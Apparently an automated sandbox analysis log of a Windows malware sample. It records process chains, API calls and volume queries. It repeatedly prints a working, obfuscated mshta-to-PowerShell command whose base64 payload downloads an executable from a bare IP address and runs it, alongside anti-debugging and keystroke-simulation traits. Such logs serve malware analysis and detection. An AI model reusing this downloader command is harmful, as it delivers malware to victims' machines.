Code function: 6_2_00513B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

6_2_00513B3A

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_005148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

6_2_005148D7

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00574C53 mouse_event,

6_2_00574C53

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\cossess.exe "C:\Users\user\AppData\Roaming\cossess.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES99C2.tmp" "c:\Users\user\AppData\Local\Temp\dkem0svg\CSCF28CCA96CDC44F1E801052D43790FDA5.TMP"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\cossess.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jhuzvxz6icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelvr5cgugicagicagicagicagicagicagicagicagicagicagicaglu1ftujlcmrlzmlosxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vbi5etewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1oz2hxefz5z0isc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihzuufzulhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbkyix1aw50icagicagicagicagicagicagicagicagicagicagicagiejuleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbsz3fzcxjargrpqik7jyagicagicagicagicagicagicagicagicagicagicagicatbmfnzsagicagicagicagicagicagicagicagicagicagicagicaic1ziv3hhqmfwiiagicagicagicagicagicagicagicagicagicagicagicatbmfnrvnqqunlicagicagicagicagicagicagicagicagicagicagicagier3icagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjhuzvxz6ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtk4ljeyljg5lji0lzm0ni9jb3nzzxmuzxhliiwijgvovjpbufbeqvrbxgnvc3nlc3muzxhliiwwldapo3nuqvjulxnsruvwkdmpo0ludk9rrs1jdevnicagicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcy29zc2vzcy5legui'+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jhuzvxz6icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelvr5cgugicagicagicagicagicagicagicagicagicagicagicaglu1ftujlcmrlzmlosxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vbi5etewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1oz2hxefz5z0isc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihzuufzulhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbkyix1aw50icagicagicagicagicagicagicagicagicagicagicagiejuleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbsz3fzcxjargrpqik7jyagicagicagicagicagicagicagicagicagicagicagicatbmfnzsagicagicagicagicagicagicagicagicagicagicagicaic1ziv3hhqmfwiiagicagicagicagicagicagicagicagicagicagicagicatbmfnrvnqqunlicagicagicagicagicagicagicagicagicagicagicagier3icagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjhuzvxz6ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtk4ljeyljg5lji0lzm0ni9jb3nzzxmuzxhliiwijgvovjpbufbeqvrbxgnvc3nlc3muzxhliiwwldapo3nuqvjulxnsruvwkdmpo0ludk9rrs1jdevnicagicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcy29zc2vzcy5legui'+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jhuzvxz6icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelvr5cgugicagicagicagicagicagicagicagicagicagicagicaglu1ftujlcmrlzmlosxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vbi5etewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1oz2hxefz5z0isc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihzuufzulhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbkyix1aw50icagicagicagicagicagicagicagicagicagicagicagiejuleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbsz3fzcxjargrpqik7jyagicagicagicagicagicagicagicagicagicagicagicatbmfnzsagicagicagicagicagicagicagicagicagicagicagicaic1ziv3hhqmfwiiagicagicagicagicagicagicagicagicagicagicagicatbmfnrvnqqunlicagicagicagicagicagicagicagicagicagicagicagier3icagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjhuzvxz6ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtk4ljeyljg5lji0lzm0ni9jb3nzzxmuzxhliiwijgvovjpbufbeqvrbxgnvc3nlc3muzxhliiwwldapo3nuqvjulxnsruvwkdmpo0ludk9rrs1jdevnicagicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcy29zc2vzcy5legui'+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jhuzvxz6icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelvr5cgugicagicagicagicagicagicagicagicagicagicagicaglu1ftujlcmrlzmlosxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vbi5etewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1oz2hxefz5z0isc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihzuufzulhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbkyix1aw50icagicagicagicagicagicagicagicagicagicagicagiejuleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbsz3fzcxjargrpqik7jyagicagicagicagicagicagicagicagicagicagicagicatbmfnzsagicagicagicagicagicagicagicagicagicagicagicaic1ziv3hhqmfwiiagicagicagicagicagicagicagicagicagicagicagicatbmfnrvnqqunlicagicagicagicagicagicagicagicagicagicagicagier3icagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjhuzvxz6ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtk4ljeyljg5lji0lzm0ni9jb3nzzxmuzxhliiwijgvovjpbufbeqvrbxgnvc3nlc3muzxhliiwwldapo3nuqvjulxnsruvwkdmpo0ludk9rrs1jdevnicagicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcy29zc2vzcy5legui'+[char]0x22+'))')))"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00567CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

6_2_00567CAF

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_0056874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

6_2_0056874B

Source: cossess.exe, 00000006.00000000.950280895.00000000005C4000.00000002.00000001.01000000.0000000A.sdmp, cossess.exe.3.dr, cosses[1].exe.3.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: cossess.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_0053862B cpuid

6_2_0053862B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
